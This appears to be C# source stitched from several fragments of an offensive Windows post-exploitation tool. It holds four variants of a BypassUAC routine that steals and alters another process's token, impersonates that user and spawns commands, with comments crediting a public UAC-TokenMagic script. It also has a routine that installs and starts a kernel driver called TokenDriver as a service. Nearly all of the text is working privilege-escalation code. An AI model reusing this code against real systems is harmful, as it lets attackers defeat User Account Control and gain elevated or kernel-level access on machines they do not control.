//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// public Boolean BypassUAC(IntPtr htoken, String command) { phNewToken = htoken; if (SetTokenInformation()) { if (ImpersonateUser()) { String arguments = ""; if (command.Contains(' ')) { String[] commandAndArguments = command.Split(new String[] { " " }, StringSplitOptions.RemoveEmptyEntries); command = commandAndArguments.First(); arguments = String.Join(" ", commandAndArguments.Skip(1).Take(commandAndArguments.Length - 1).ToArray()); } if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments)) { advapi32.RevertToSelf(); return(true); } } advapi32.RevertToSelf(); } return(false); }
//////////////////////////////////////////////////////////////////////////////// //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1 //////////////////////////////////////////////////////////////////////////////// public void BypassUAC(Int32 processId, String command) { Console.WriteLine(" [+] Running as: " + WindowsIdentity.GetCurrent().Name); GetPrimaryToken((UInt32)processId); SetTokenInformation(); ImpersonateUser(); CreateProcess.CreateProcessWithLogonW(phNewToken, command, ""); }
//////////////////////////////////////////////////////////////////////////////// //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1 //////////////////////////////////////////////////////////////////////////////// public Boolean BypassUAC(Int32 processId, String command) { if (GetPrimaryToken((UInt32)processId)) { if (SetTokenInformation()) { if (ImpersonateUser()) { if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, "")) { advapi32.RevertToSelf(); return(true); } } advapi32.RevertToSelf(); } } return(false); }
//////////////////////////////////////////////////////////////////////////////// //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1 //////////////////////////////////////////////////////////////////////////////// public Boolean BypassUAC(Int32 processId, String command) { if (GetPrimaryToken((UInt32)processId)) { if (SetTokenInformation()) { if (ImpersonateUser()) { String arguments = String.Empty; FindExe(ref command, out arguments); if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments)) { advapi32.RevertToSelf(); return(true); } } advapi32.RevertToSelf(); } } return(false); }
//////////////////////////////////////////////////////////////////////////////// // sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel //////////////////////////////////////////////////////////////////////////////// private static void _InstallDriver(CommandLineParsing cLP) { //string servicename = Misc.NextItem(ref command); //string path = Misc.NextItem(ref command); //string force = Misc.NextItem(ref command); string serviceName = "TokenDriver"; string sn; if (cLP.GetData("ServiceName", out sn)) { serviceName = sn; } string path = string.Empty; string p; if (cLP.GetData("Path", out p)) { path = (string)p; } bool overwrite = false; object f; if (cLP.GetData("Force", out f)) { overwrite = true; } Console.WriteLine("[*] Service Name: " + serviceName); Console.WriteLine("[*] Service Path: " + path); PSExec psexec = new PSExec(serviceName); if (!psexec.Connect(".")) { Console.WriteLine("[-] Unable to connect to service controller"); return; } string filename; try { filename = Path.GetFullPath(path); } catch (Exception ex) { if (ex is ArgumentException) { filename = CreateProcess.FindFilePath(path); if (string.IsNullOrEmpty(filename)) { Console.WriteLine("[-] Unable to locate service binary"); return; } } else { return; } } Console.WriteLine("[*] Full Path: " + filename); if (!File.Exists(filename)) { Console.WriteLine("[-] Unable to find service binary: {0}"); return; } if (!psexec.Open()) { if (!psexec.CreateDriver(filename, overwrite)) { return; } if (!psexec.Open()) { return; } } if (!psexec.Start()) { return; } }